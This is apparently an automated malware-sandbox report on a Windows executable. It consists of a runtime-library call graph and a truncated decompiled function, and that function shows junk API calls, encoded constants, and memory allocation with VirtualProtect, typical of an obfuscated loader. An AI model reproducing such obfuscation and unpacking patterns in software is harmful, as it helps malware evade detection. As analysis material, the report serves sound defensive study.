__getptd_noexit 68 API calls 10340->10341 10342 407eaf 10341->10342 10342->10282 10344 41328d ___lock_fhandle 10343->10344 10345 40e054 __mtinitlocknum 68 API calls 10344->10345 10346 41329d 10345->10346 10347 40e117 __lock 68 API calls 10346->10347 10348 4132a2 ___lock_fhandle 10346->10348 10357 4132b1 10347->10357 10348->10288 10349 4133f4 10478 413412 10349->10478 10350 41338a 10352 41065a __calloc_crt 68 API calls 10350->10352 10356 413393 10352->10356 10353 413332 EnterCriticalSection 10355 413342 LeaveCriticalSection 10353->10355 10353->10357 10354 40e117 __lock 68 API calls 10354->10357 10355->10357 10356->10349 10468 4131ba 10356->10468 10357->10349 10357->10350 10357->10353 10357->10354 10359 411376 ___lock_fhandle InitializeCriticalSectionAndSpinCount 10357->10359 10465 413354 10357->10465 10359->10357 10362 407eaa __write_nolock 68 API calls 10361->10362 10363 407ec8 _realloc 10362->10363 10364 407e97 __cftoe_l 68 API calls 10363->10364 10365 407edb 10364->10365 10365->10303 10367 4130a3 10366->10367 10369 41304a 10366->10369 10368 407e97 __cftoe_l 68 API calls 10367->10368 10370 4130a8 10368->10370 10369->10367 10373 41306e 10369->10373 10372 407eaa __write_nolock 68 API calls 10370->10372 10371 410aa8 10371->10308 10371->10326 10375 40b97c 10371->10375 10372->10371 10373->10371 10374 413093 SetStdHandle 10373->10374 10374->10371 10481 413143 10375->10481 10377 40b98b 10378 40b9a1 SetFilePointer 10377->10378 10379 40b991 10377->10379 10381 40b9b8 GetLastError 10378->10381 10383 40b9c0 10378->10383 10380 407e97 __cftoe_l 68 API calls 10379->10380 10382 40b996 10380->10382 10381->10383 10382->10315 10382->10326 10383->10382 10384 407ebd __dosmaperr 68 API calls 10383->10384 10384->10382 10386 413143 __lseek_nolock 68 API calls 10385->10386 10389 414eec 10386->10389 10387 414f42 10390 4130bd __free_osfhnd 69 API calls 10387->10390 10388 414f20 10388->10387 10392 413143 __lseek_nolock 68 API calls 10388->10392 10389->10387 10389->10388 10391 413143 __lseek_nolock 68 API calls 10389->10391 10393 414f4a 10390->10393 10394 414f17 10391->10394 10395 414f2c CloseHandle 10392->10395 10396 414f6c 10393->10396 10399 407ebd __dosmaperr 68 API calls 10393->10399 10397 413143 __lseek_nolock 68 API calls 10394->10397 10395->10387 10398 414f38 GetLastError 10395->10398 10396->10326 10397->10388 10398->10387 10399->10396 10494 40f63d 10400->10494 10403 407e97 __cftoe_l 68 API calls 10405 414db3 10403->10405 10404 40f63d __lseeki64_nolock 70 API calls 10406 414d61 10404->10406 10405->10326 10407 414e43 10406->10407 10408 414d87 GetProcessHeap HeapAlloc 10406->10408 10413 414da8 10406->10413 10409 414eac 10407->10409 10414 40f63d __lseeki64_nolock 70 API calls 10407->10414 10410 414da3 10408->10410 10420 414dba __setmode_nolock 10408->10420 10411 40f63d __lseeki64_nolock 70 API calls 10409->10411 10409->10413 10412 407e97 __cftoe_l 68 API calls 10410->10412 10411->10413 10412->10413 10413->10403 10413->10405 10415 414e5c 10414->10415 10415->10413 10416 413143 __lseek_nolock 68 API calls 10415->10416 10417 414e72 SetEndOfFile 10416->10417 10417->10409 10419 414e8f 10417->10419 10421 407e97 __cftoe_l 68 API calls 10419->10421 10422 414e26 10420->10422 10430 414dfd __setmode_nolock 10420->10430 10504 4127e4 10420->10504 10423 414e94 10421->10423 10424 407eaa __write_nolock 68 API calls 10422->10424 10425 407eaa __write_nolock 68 API calls 10423->10425 10427 414e2b 10424->10427 10426 414e9f GetLastError 10425->10426 10426->10409 10428 407e97 __cftoe_l 68 API calls 10427->10428 10427->10430 10428->10430 10429 414e0b GetProcessHeap HeapFree 10429->10409 10430->10429 10432 412f23 ___lock_fhandle 10431->10432 10433 412f46 10432->10433 10434 412f2b 10432->10434 10436 412f54 10433->10436 10439 412f95 10433->10439 10435 407eaa __write_nolock 68 API calls 10434->10435 10437 412f30 10435->10437 10438 407eaa __write_nolock 68 API calls 10436->10438 10440 407e97 __cftoe_l 68 API calls 10437->10440 10441 412f59 10438->10441 10442 4131ba ___lock_fhandle 69 API calls 10439->10442 10449 412f38 ___lock_fhandle 10440->10449 10443 407e97 __cftoe_l 68 API calls 10441->10443 10444 412f9b 10442->10444 10445 412f60 10443->10445 10447 412fa8 10444->10447 10448 412fbe 10444->10448 10446 406b09 __cftoe_l 6 API calls 10445->10446 10446->10449 10450 4127e4 __write_nolock 100 API calls 10447->10450 10451 407e97 __cftoe_l 68 API calls 10448->10451 10449->10326 10452 412fb6 10450->10452 10453 412fc3 10451->10453 10563 412fe9 10452->10563 10454 407eaa __write_nolock 68 API calls 10453->10454 10454->10452 10457 413129 10456->10457 10458 4130ce 10456->10458 10459 407e97 __cftoe_l 68 API calls 10457->10459 10458->10457 10464 4130f9 10458->10464 10460 41312e 10459->10460 10461 407eaa __write_nolock 68 API calls 10460->10461 10462 41311f 10461->10462 10462->10320 10463 413119 SetStdHandle 10463->10462 10464->10462 10464->10463 10466 40e03d _doexit LeaveCriticalSection 10465->10466 10467 41335b 10466->10467 10467->10357 10469 4131c6 ___lock_fhandle 10468->10469 10470 413221 10469->10470 10471 40e117 __lock 68 API calls 10469->10471 10472 413226 EnterCriticalSection 10470->10472 10474 413243 ___lock_fhandle 10470->10474 10473 4131f2 10471->10473 10472->10474 10475 411376 ___lock_fhandle InitializeCriticalSectionAndSpinCount 10473->10475 10477 413209 10473->10477 10474->10349 10475->10477 10476 413251 ___lock_fhandle LeaveCriticalSection 10476->10470 10477->10476 10479 40e03d _doexit LeaveCriticalSection 10478->10479 10480 413419 10479->10480 10480->10348 10482 413150 10481->10482 10483 413168 10481->10483 10484 407eaa __write_nolock 68 API calls 10482->10484 10486 407eaa __write_nolock 68 API calls 10483->10486 10493 4131ad 10483->10493 10485 413155 10484->10485 10487 407e97 __cftoe_l 68 API calls 10485->10487 10488 413196 10486->10488 10489 41315d 10487->10489 10490 407e97 __cftoe_l 68 API calls 10488->10490 10489->10377 10491 41319d 10490->10491 10492 406b09 __cftoe_l 6 API calls 10491->10492 10492->10493 10493->10377 10495 413143 __lseek_nolock 68 API calls 10494->10495 10496 40f65b 10495->10496 10497 40f663 10496->10497 10498 40f674 SetFilePointer 10496->10498 10499 407e97 __cftoe_l 68 API calls 10497->10499 10500 40f68c GetLastError 10498->10500 10501 40f668 10498->10501 10499->10501 10500->10501 10502 40f696 10500->10502 10501->10404 10501->10413 10503 407ebd __dosmaperr 68 API calls 10502->10503 10503->10501 10505 4127f3 __write_nolock 10504->10505 10506 412825 10505->10506 10507 41284c 10505->10507 10537 41281a 10505->10537 10509 407eaa __write_nolock 68 API calls 10506->10509 10510 4128b4 10507->10510 10511 41288e 10507->10511 10508 407aab __atodbl_l 5 API calls 10512 412f15 10508->10512 10513 41282a 10509->10513 10515 4128c8 10510->10515 10519 40f63d __lseeki64_nolock 70 API calls 10510->10519 10514 407eaa __write_nolock 68 API calls 10511->10514 10512->10420 10516 407e97 __cftoe_l 68 API calls 10513->10516 10518 412893 10514->10518 10517 411667 __write_nolock 68 API calls 10515->10517 10520 412831 10516->10520 10522 4128d3 10517->10522 10523 407e97 __cftoe_l 68 API calls 10518->10523 10519->10515 10521 406b09 __cftoe_l 6 API calls 10520->10521 10521->10537 10524 412b79 10522->10524 10529 408bf1 __getptd 68 API calls 10522->10529 10525 41289c 10523->10525 10527 412b89 10524->10527 10528 412e48 WriteFile 10524->10528 10526 406b09 __cftoe_l 6 API calls 10525->10526 10526->10537 10530 412c67 10527->10530 10531 412b9d 10527->10531 10533 412e7b GetLastError 10528->10533 10555 412b5b 10528->10555 10532 4128ee GetConsoleMode 10529->10532 10553 412c76 10530->10553 10556 412d47 10530->10556 10534 412ec6 10531->10534 10543 412c0b WriteFile 10531->10543 10531->10555 10532->10524 10535 412919 10532->10535 10533->10555 10534->10537 10539 407e97 __cftoe_l 68 API calls 10534->10539 10535->10524 10536 41292b GetConsoleCP 10535->10536 10536->10555 10557 41294e 10536->10557 10537->10508 10538 412e99 10541 412ea4 10538->10541 10542 412eb8 10538->10542 10544 412ee9 10539->10544 10540 412dad WideCharToMultiByte 10540->10533 10547 412de4 WriteFile 10540->10547 10546 407e97 __cftoe_l 68 API calls 10541->10546 10549 407ebd __dosmaperr 68 API calls 10542->10549 10543->10531 10543->10533 10545 407eaa __write_nolock 68 API calls 10544->10545 10545->10537 10550 412ea9 10546->10550 10551 412e1b GetLastError 10547->10551 10547->10556 10548 412ceb WriteFile 10548->10533 10548->10553 10549->10537 10552 407eaa __write_nolock 68 API calls 10550->10552 10551->10556 10552->10537 10553->10534 10553->10548 10553->10555 10554 4118c3 __write_nolock 78 API calls 10554->10557 10555->10534 10555->10537 10555->10538 10556->10534 10556->10540 10556->10547 10556->10555 10557->10533 10557->10554 10557->10555 10558 4129fa WideCharToMultiByte 10557->10558 10559 415b37 80 API calls __fassign 10557->10559 10561 41595b 11 API calls __putwch_nolock 10557->10561 10562 412a7f WriteFile 10557->10562 10558->10555 10560 412a2b WriteFile 10558->10560 10559->10557 10560->10533 10560->10557 10561->10557 10562->10533 10562->10557 10564 41325a __unlock_fhandle LeaveCriticalSection 10563->10564 10565 412ff1 10564->10565 10565->10449 10566->10331 10568 409041 LeaveCriticalSection 10567->10568 10569 409022 10567->10569 10568->10185 10569->10568 10570 409029 10569->10570 10573 40e03d LeaveCriticalSection 10570->10573 10572 40903e 10572->10185 10573->10572 10575 408fb0 10574->10575 10576 408fd2 EnterCriticalSection 10574->10576 10575->10576 10577 408fb8 10575->10577 10579 40726e 10576->10579 10578 40e117 __lock 68 API calls 10577->10578 10578->10579 10580 407194 10579->10580 10581 4071b4 10580->10581 10582 4071a4 10580->10582 10584 4071c6 10581->10584 10595 40bc60 10581->10595 10583 407e97 __cftoe_l 68 API calls 10582->10583 10587 4071a9 10583->10587 10612 40bacd 10584->10612 10592 407299 10587->10592 10593 409011 __fsopen 2 API calls 10592->10593 10594 4072a1 10593->10594 10594->10031 10596 40bc93 10595->10596 10597 40bc73 10595->10597 10598 40a7a8 __fileno 68 API calls 10596->10598 10599 407e97 __cftoe_l 68 API calls 10597->10599 10600 40bc99 10598->10600 10601 40bc78 10599->10601 10603 40b9f1 __locking 72 API calls 10600->10603 10602 406b09 __cftoe_l 6 API calls 10601->10602 10604 40bc88 10602->10604 10605 40bcae 10603->10605 10604->10584 10605->10604 10606 40bd22 10605->10606 10608 40bcdd 10605->10608 10607 407e97 __cftoe_l 68 API calls 10606->10607 10607->10604 10608->10604 10609 40b9f1 __locking 72 API calls 10608->10609 10610 40bd7d 10609->10610 10610->10604 10611 40b9f1 __locking 72 API calls 10610->10611 10611->10604 10613 40bae6 10612->10613 10617 4071d4 10612->10617 10614 40a7a8 __fileno 68 API calls 10613->10614 10613->10617 10615 40bb01 10614->10615 10616 412f17 __locking 102 API calls 10615->10616 10616->10617 10618 40a7a8 10617->10618 10619 40a7b7 10618->10619 10621 407206 10618->10621 10620 407e97 __cftoe_l 68 API calls 10619->10620 10622 40a7bc 10620->10622 10624 40b9f1 10621->10624 10623 406b09 __cftoe_l 6 API calls 10622->10623 10623->10621 10625 40b9fd ___lock_fhandle 10624->10625 10626 40ba20 10625->10626 10627 40ba05 10625->10627 10629 40ba2e 10626->10629 10634 40ba6f 10626->10634 10628 407eaa __write_nolock 68 API calls 10627->10628 10630 40ba0a 10628->10630 10631 407eaa __write_nolock 68 API calls 10629->10631 10632 407e97 __cftoe_l 68 API calls 10630->10632 10633 40ba33 10631->10633 10644 40ba12 ___lock_fhandle 10632->10644 10636 407e97 __cftoe_l 68 API calls 10633->10636 10635 4131ba ___lock_fhandle 69 API calls 10634->10635 10637 40ba75 10635->10637 10638 40ba3a 10636->10638 10639 40ba82 10637->10639 10640 40ba98 10637->10640 10641 406b09 __cftoe_l 6 API calls 10638->10641 10642 40b97c __lseek_nolock 70 API calls 10639->10642 10643 407e97 __cftoe_l 68 API calls 10640->10643 10641->10644 10645 40ba90 10642->10645 10646 40ba9d 10643->10646 10644->10587 10649 40bac3 10645->10649 10647 407eaa __write_nolock 68 API calls 10646->10647 10647->10645 10652 41325a LeaveCriticalSection 10649->10652 10651 40bacb 10651->10644 10652->10651 10654 408460 10653->10654 10655 408455 10653->10655 10657 408537 10654->10657 10658 4084b1 10654->10658 10660 4084f3 10654->10660 10656 4089a5 __decode_pointer 6 API calls 10655->10656 10656->10654 10659 407e97 __cftoe_l 68 API calls 10657->10659 10657->10660 10658->10660 10661 407e97 __cftoe_l 68 API calls 10658->10661 10659->10660 10660->10041 10661->10660 10663 40f2c0 10662->10663 10664 40f2e8 10662->10664 10680 40f212 10663->10680 10666 407e97 __cftoe_l 68 API calls 10664->10666 10668 40f2ed __ctrlfp 10666->10668 10667 40f2e3 10667->10040 10668->10040 10670 40f33d __handle_exc 10669->10670 10673 40f363 __except1 10670->10673 10695 40efac 10670->10695 10672 40f3a5 10675 40f1b1 __87except 68 API calls 10672->10675 10673->10672 10674 40f37e 10673->10674 10676 40f212 __umatherr 68 API calls 10674->10676 10677 40f3a0 __ctrlfp 10675->10677 10676->10677 10678 407aab __atodbl_l 5 API calls 10677->10678 10679 40f3c9 10678->10679 10679->10040 10681 40f21c 10680->10681 10682 40f237 __87except __ctrlfp 10681->10682 10683 40f295 __ctrlfp 10681->10683 10686 40f285 10682->10686 10688 40f1b1 10682->10688 10684 40f1b1 __87except 68 API calls 10683->10684 10685 40f2aa 10684->10685 10685->10667 10686->10667 10689 40f1d1 10688->10689 10690 40f1bc 10688->10690 10692 407e97 __cftoe_l 68 API calls 10689->10692 10691 40f1d6 10690->10691 10693 407e97 __cftoe_l 68 API calls 10690->10693 10691->10686 10692->10691 10694 40f1c9 10693->10694 10694->10686 10698 40ecd0 10695->10698 10699 40ecf7 __raise_exc_ex 10698->10699 10700 40eeea RaiseException 10699->10700 10701 40ef03 10700->10701 10701->10673 10703 40a7a8 __fileno 68 API calls 10702->10703 10704 4097ce 10703->10704 10750 411667 10704->10750 10706 409821 10706->10067 10707 4097d4 __stbuf 10707->10706 10708 410615 __malloc_crt 68 API calls 10707->10708 10708->10706 10710 40b84d 10709->10710 10713 40b82c 10709->10713 10710->10073 10711 40b838 10712 407e97 __cftoe_l 68 API calls 10711->10712 10714 40b83d 10712->10714 10713->10710 10713->10711 10720 40b86b ___crtGetEnvironmentStringsA 10713->10720 10715 406b09 __cftoe_l 6 API calls 10714->10715 10715->10710 10716 40b6b6 __flsbuf 102 API calls 10716->10720 10717 40bacd __flush 102 API calls 10717->10720 10718 40a7a8 __fileno 68 API calls 10718->10720 10719 412f17 __locking 102 API calls 10719->10720 10720->10710 10720->10716 10720->10717 10720->10718 10720->10719 10722 40a7a8 __fileno 68 API calls 10721->10722 10723 40b6c6 10722->10723 10724 40b6d1 10723->10724 10725 40b6e8 10723->10725 10727 407e97 __cftoe_l 68 API calls 10724->10727 10726 40b6ec 10725->10726 10735 40b6f9 __stbuf 10725->10735 10728 407e97 __cftoe_l 68 API calls 10726->10728 10729 40b6d6 10727->10729 10728->10729 10729->10070 10730 40b7e9 10732 412f17 __locking 102 API calls 10730->10732 10731 40b769 10733 40b780 10731->10733 10737 40b79d 10731->10737 10732->10729 10734 412f17 __locking 102 API calls 10733->10734 10734->10729 10735->10729 10736 411667 __write_nolock 68 API calls 10735->10736 10738 40b74f 10735->10738 10741 40b75a 10735->10741 10736->10738 10737->10729 10762 40f6c2 10737->10762 10738->10741 10759 412ff3 10738->10759 10741->10730 10741->10731 10743 409866 10742->10743 10744 40716a 10742->10744 10743->10744 10745 40bacd __flush 102 API calls 10743->10745 10746 407181 10744->10746 10745->10744 10747 407186 __stbuf 10746->10747 10748 40904d __getstream 2 API calls 10747->10748 10749 407191 10748->10749 10749->10063 10751 411683 10750->10751 10752 411674 10750->10752 10754 407e97 __cftoe_l 68 API calls 10751->10754 10757 4116a7 10751->10757 10753 407e97 __cftoe_l 68 API calls 10752->10753 10755 411679 10753->10755 10756 411697 10754->10756 10755->10707 10758 406b09 __cftoe_l 6 API calls 10756->10758 10757->10707 10758->10757 10760 410615 __malloc_crt 68 API calls 10759->10760 10761 413008 10760->10761 10761->10741 10763 40f6ce ___lock_fhandle 10762->10763 10764 40f6fb 10763->10764 10765 40f6df 10763->10765 10766 40f709 10764->10766 10769 40f72a 10764->10769 10767 407eaa __write_nolock 68 API calls 10765->10767 10770 407eaa __write_nolock 68 API calls 10766->10770 10768 40f6e4 10767->10768 10771 407e97 __cftoe_l 68 API calls 10768->10771 10773 40f770 10769->10773 10774 40f74a 10769->10774 10772 40f70e 10770->10772 10786 40f6ec ___lock_fhandle 10771->10786 10776 407e97 __cftoe_l 68 API calls 10772->10776 10775 4131ba ___lock_fhandle 69 API calls 10773->10775 10777 407eaa __write_nolock 68 API calls 10774->10777 10779 40f776 10775->10779 10780 40f715 10776->10780 10778 40f74f 10777->10778 10781 407e97 __cftoe_l 68 API calls 10778->10781 10782 40f783 10779->10782 10783 40f79f 10779->10783 10784 406b09 __cftoe_l 6 API calls 10780->10784 10785 40f756 10781->10785 10787 40f63d __lseeki64_nolock 70 API calls 10782->10787 10788 407e97 __cftoe_l 68 API calls 10783->10788 10784->10786 10789 406b09 __cftoe_l 6 API calls 10785->10789 10786->10729 10790 40f794 10787->10790 10791 40f7a4 10788->10791 10789->10786 10794 40f7d1 10790->10794 10792 407eaa __write_nolock 68 API calls 10791->10792 10792->10790 10797 41325a LeaveCriticalSection 10794->10797 10796 40f7d9 10796->10786 10797->10796 10799 408860 ___lock_fhandle 10798->10799 10800 408f9e __lock_file 69 API calls 10799->10800 10801 408868 10800->10801 10806 4087b8 10801->10806 10805 408890 ___lock_fhandle 10805->10089 10807 408842 10806->10807 10808 4087c9 10806->10808 10809 407e97 __cftoe_l 68 API calls 10807->10809 10808->10807 10810 4087da 10808->10810 10818 408834 10809->10818 10813 4087eb 10810->10813 10822 40f7db 10810->10822 10812 40bacd __flush 102 API calls 10814 4087fa 10812->10814 10813->10812 10815 40a7a8 __fileno 68 API calls 10814->10815 10816 40882d 10815->10816 10817 40f6c2 __lseeki64 72 API calls 10816->10817 10817->10818 10819 408899 10818->10819 10820 409011 __fsopen 2 API calls 10819->10820 10821 4088a1 10820->10821 10821->10805 10823 40f7ea __write_nolock 10822->10823 10824 40a7a8 __fileno 68 API calls 10823->10824 10825 40f800 10824->10825 10826 40f6c2 __lseeki64 72 API calls 10825->10826 10827 40f81d 10826->10827 10828 40fa00 10827->10828 10829 40f8a6 10827->10829 10836 40f838 10827->10836 10831 40fa04 10828->10831 10838 40f9cc 10828->10838 10833 40f8be 10829->10833 10829->10838 10830 407aab __atodbl_l 5 API calls 10832 40fb25 10830->10832 10834 407e97 __cftoe_l 68 API calls 10831->10834 10832->10813 10835 40f6c2 __lseeki64 72 API calls 10833->10835 10833->10836 10834->10836 10837 40f8ee 10835->10837 10836->10830 10837->10836 10840 40f911 ReadFile 10837->10840 10838->10836 10839 40f6c2 __lseeki64 72 API calls 10838->10839 10841 40fa52 10839->10841 10840->10836 10842 40f936 10840->10842 10841->10836 10843 40f6c2 __lseeki64 72 API calls 10841->10843 10844 40f6c2 __lseeki64 72 API calls 10842->10844 10843->10836 10844->10836 10846 40988f _LocaleUpdate::_LocaleUpdate 78 API calls 10845->10846 10847 409a23 10846->10847 10848 409a27 10847->10848 10851 40a7a8 __fileno 68 API calls 10847->10851 10863 409a68 __output_l __aulldvrm _strlen 10847->10863 10849 407e97 __cftoe_l 68 API calls 10848->10849 10850 409a2c 10849->10850 10852 406b09 __cftoe_l 6 API calls 10850->10852 10851->10863 10853 409a3e 10852->10853 10854 407aab __atodbl_l 5 API calls 10853->10854 10855 406cfa 10854->10855 10855->10109 10857 409916 102 API calls __output_l 10857->10863 10858 408391 ___crtGetEnvironmentStringsA 68 API calls 10858->10863 10859 409949 102 API calls _write_multi_char 10859->10863 10860 40996f 102 API calls _write_string 10860->10863 10861 41186e 80 API calls __cftof 10861->10863 10862 410615 __malloc_crt 68 API calls 10862->10863 10863->10848 10863->10853 10863->10857 10863->10858 10863->10859 10863->10860 10863->10861 10863->10862 10864 4089a5 6 API calls __decode_pointer 10863->10864 10868 41188b 10863->10868 10864->10863 10866 409011 __fsopen 2 API calls 10865->10866 10867 406d24 10866->10867 10867->10104 10869 40988f _LocaleUpdate::_LocaleUpdate 78 API calls 10868->10869 10870 41189e 10869->10870 10870->10863 10872 40b364 10871->10872 10873 40b36b 10871->10873 10874 40c5c5 __NMSG_WRITE 68 API calls 10872->10874 10883 412537 10873->10883 10874->10873 10877 40b37c _memset 10879 40b454 10877->10879 10882 40b414 SetUnhandledExceptionFilter UnhandledExceptionFilter 10877->10882 10907 40c543 10879->10907 10882->10879 10884 4089a5 __decode_pointer 6 API calls 10883->10884 10885 40b371 10884->10885 10885->10877 10886 412544 10885->10886 10887 412550 ___lock_fhandle 10886->10887 10888 412577 10887->10888 10889 41258d 10887->10889 10890 4125ac 10887->10890 10896 412573 10887->10896 10891 408b78 __getptd_noexit 68 API calls 10888->10891 10892 4089a5 __decode_pointer 6 API calls 10889->10892 10890->10889 10893 4125bb 10890->10893 10894 41257c _siglookup 10891->10894 10892->10894 10895 407e97 __cftoe_l 68 API calls 10893->10895 10898 412622 10894->10898 10900 40c543 _abort 68 API calls 10894->10900 10906 412585 ___lock_fhandle 10894->10906 10897 4125c0 10895->10897 10896->10888 10896->10893 10899 406b09 __cftoe_l 6 API calls 10897->10899 10901 40e117 __lock 68 API calls 10898->10901 10903 41262d 10898->10903 10899->10906 10900->10898 10901->10903 10902 40899c __init_pointers 7 API calls 10904 412662 10902->10904 10903->10902 10903->10904 10910 4126b8 10904->10910 10906->10877 10915 40c401 10907->10915 10909 40b45b 10911 4126c5 10910->10911 10912 4126be 10910->10912 10911->10906 10914 40e03d LeaveCriticalSection 10912->10914 10914->10911 10916 40c40d ___lock_fhandle 10915->10916 10917 40e117 __lock 68 API calls 10916->10917 10918 40c414 10917->10918 10920 4089a5 __decode_pointer 6 API calls 10918->10920 10922 40c4cd __initterm 10918->10922 10923 40c44b 10920->10923 10932 40c518 10922->10932 10923->10922 10926 4089a5 __decode_pointer 6 API calls 10923->10926 10925 40c515 ___lock_fhandle 10925->10909 10931 40c460 10926->10931 10927 40c50c 10928 40c311 _doexit 3 API calls 10927->10928 10928->10925 10929 4089a5 6 API calls __decode_pointer 10929->10931 10930 40899c 7 API calls __init_pointers 10930->10931 10931->10922 10931->10929 10931->10930 10933 40c4f9 10932->10933 10934 40c51e 10932->10934 10933->10925 10936 40e03d LeaveCriticalSection 10933->10936 10937 40e03d LeaveCriticalSection 10934->10937 10936->10927 10937->10933 10939 40566c 10938->10939 10940 4056ae FindNextFileW 10939->10940 10941 4056e7 GetFileAttributesExW SetVolumeMountPointW 10939->10941 10942 405753 WaitNamedPipeW ReadConsoleInputA CreateEventW MoveFileExA InterlockedDecrement 10939->10942 10943 4057ee 10939->10943 10940->10939 10941->10939 10942->10939 10943->10121 10946 40ca66 10944->10946 10945 4138ed __wincmdln 78 API calls 10945->10946 10946->10945 10948 40cad3 10946->10948 10947 40cbd1 10947->9057 10947->9059 10948->10947 10949 4138ed 78 API calls __wincmdln 10948->10949 10949->10948 10950 40899c 10951 40892a __encode_pointer 7 API calls 10950->10951 10952 4089a3 10951->10952

                    Executed Functions

                    Function 004059A0 Relevance: 117.8, APIs: 41, Strings: 26, Instructions: 565memoryfilesynchronizationCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 4059a0-4059d1 call 405980 3 4059d3-4059df GetLastError 0->3 4 406342-406355 GetGeoInfoA GetSystemDefaultLCID 3->4 5 4059e5-40633b 3->5 6 406364-40639d GlobalAlloc VirtualProtect 4->6 7 406357-40635e 4->7 5->4 8 4063a3-40647d GetVersion WriteConsoleW GetLastError HeapFree SetConsoleCursorInfo FindNextFileA call 406bf3 call 40721e call 406730 call 407300 call 406870 call 406d40 call 407035 call 406e70 6->8 9 40648f-406498 6->9 7->3 7->6 8->9 66 40647f-40648c call 406d26 8->66 10 4064e3-4064e7 9->10 11 40649a-4064de FoldStringA call 406744 call 40698d call 406e70 call 406c0a call 40701f call 406f8a 9->11 14 406540-406558 10->14 15 4064e9-4064ef 10->15 11->10 18 406566-40656b 14->18 19 4064f0-40651a 15->19 25 40658d-406597 18->25 26 40656d-406589 ConvertFiberToThread SetFileAttributesW AddAtomA SetFileShortNameW 18->26 21 406535-40653e 19->21 22 40651c-40652f LocalAlloc GetBinaryTypeW CreateMutexA 19->22 21->14 21->19 22->21 29 406560 25->29 30 406599-40659e call 405800 25->30 26->25 29->18 39 4065a0-4065a6 30->39 42 4065a8 call 405960 39->42 43 4065ad-4065b4 39->43 42->43 43->39 47 4065b6-4065c8 43->47 50 4065d0-4065d7 47->50 51 4065d9-406604 GetFileAttributesExW GetFileType LocalAlloc WritePrivateProfileStringA DeregisterEventSource 50->51 52 40660a-406611 50->52 51->52 55 406613-406621 GetConsoleAliasA 52->55 56 406627-40662c 52->56 55->56 56->50 58 40662e-406648 56->58 60 406650-40665a 58->60 62 4066a8-4066ad 60->62 63 40665c-4066a2 FindFirstChangeNotificationA GetFileAttributesA SetComputerNameA SetThreadExecutionState TlsGetValue SetTimeZoneInformation GetFileAttributesW SetFileShortNameA 60->63 62->60 65 4066af-4066ce LoadLibraryA 62->65 63->62 66->9
                    C-Code - Quality: 70%
                    			E004059A0(long long __fp0) {
				struct _SECURITY_ATTRIBUTES* _v28;
				signed int _v36;
				void _v1112;
				struct _WIN32_FIND_DATAA _v1432;
				struct _TIME_ZONE_INFORMATION _v1612;
				struct _SECURITY_ATTRIBUTES* _v1616;
				intOrPtr _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				short _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				intOrPtr _v1676;
				intOrPtr _v1680;
				intOrPtr _v1684;
				intOrPtr _v1688;
				intOrPtr _v1692;
				intOrPtr _v1696;
				intOrPtr _v1700;
				intOrPtr _v1704;
				intOrPtr _v1708;
				intOrPtr _v1712;
				intOrPtr _v1716;
				intOrPtr _v1720;
				intOrPtr _v1724;
				intOrPtr _v1728;
				intOrPtr _v1732;
				intOrPtr _v1736;
				intOrPtr _v1740;
				intOrPtr _v1744;
				intOrPtr _v1748;
				intOrPtr _v1752;
				intOrPtr _v1756;
				intOrPtr _v1760;
				intOrPtr _v1764;
				intOrPtr _v1768;
				intOrPtr _v1772;
				intOrPtr _v1776;
				intOrPtr _v1780;
				intOrPtr _v1784;
				intOrPtr _v1788;
				intOrPtr _v1792;
				intOrPtr _v1796;
				intOrPtr _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				intOrPtr _v1812;
				intOrPtr _v1816;
				intOrPtr _v1820;
				intOrPtr _v1824;
				intOrPtr _v1828;
				intOrPtr _v1832;
				intOrPtr _v1836;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v1848;
				intOrPtr _v1852;
				intOrPtr _v1856;
				intOrPtr _v1860;
				intOrPtr _v1864;
				intOrPtr _v1868;
				intOrPtr _v1872;
				intOrPtr _v1876;
				intOrPtr _v1880;
				intOrPtr _v1884;
				intOrPtr _v1888;
				intOrPtr _v1892;
				intOrPtr _v1896;
				intOrPtr _v1900;
				intOrPtr _v1904;
				intOrPtr _v1908;
				intOrPtr _v1912;
				intOrPtr _v1916;
				intOrPtr _v1920;
				intOrPtr _v1924;
				intOrPtr _v1928;
				intOrPtr _v1936;
				long _v1948;
				long _v1952;
				char _v1956;
				intOrPtr _v1964;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t579;
				char _t581;
				struct HINSTANCE__* _t596;
				intOrPtr* _t609;
				intOrPtr* _t624;
				intOrPtr* _t626;
				intOrPtr* _t628;
				intOrPtr* _t631;
				intOrPtr* _t764;
				long _t770;
				long _t771;
				long _t772;
				void* _t774;
				void* _t778;
				struct _SECURITY_ATTRIBUTES* _t834;
				void* _t835;
				signed int _t840;
				signed int _t841;
				void* _t842;
				long long* _t845;
				intOrPtr* _t846;
				intOrPtr* _t847;
				long long _t869;

				_t869 = __fp0;
				_t841 = _t840 & 0xffffffc0;
				_push(0xffffffff);
				_push(E0041802B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t841;
				_t842 = _t841 - 0x7a8;
				E00405980();
				_t764 = __imp__GetGeoInfoA;
				_t834 = 0;
				while(1) {
					GetLastError();
					if(_t834 < 0x120723e) {
						_v1712 = 0x4e627021;
						_v1912 = 0x215b6660;
						_v1760 = 0x6e920e9b;
						_v1664 = 0x87d3fa0;
						_v1820 = 0x3a438c4f;
						_v1660 = 0x25908a53;
						_v1848 = 0x4f4b3cb4;
						_v1824 = 0x4024fb6f;
						_v1700 = 0x330756b8;
						_v1780 = 0x61da5a75;
						_v1876 = 0x25e7b9ba;
						_v1788 = 0x26b6ac0f;
						_v1636 = 0x376478e4;
						_v1640 = 0x5a58f071;
						_v1880 = 0x41f9f06d;
						_v1708 = 0x67b165ff;
						_v1668 = 0x424ff23e;
						_v1716 = 0x7ff6fa55;
						_v1924 = 0x53a124ed;
						_v1828 = 0x588436bd;
						_v1632 = 0x55cc7f95;
						_v1800 = 0x562ba11;
						_v1704 = 0x43b1fae2;
						_v1884 = 0x607a8146;
						_v1688 = 0x3c4d15ea;
						_v1864 = 0x1e181e91;
						_v1928 = 0x111b4c9f;
						_v1724 = 0x5b050ab5;
						_v1732 = 0x541bbf7b;
						_v1644 = 0x4a83859f;
						_v1796 = 0xd1aa2e5;
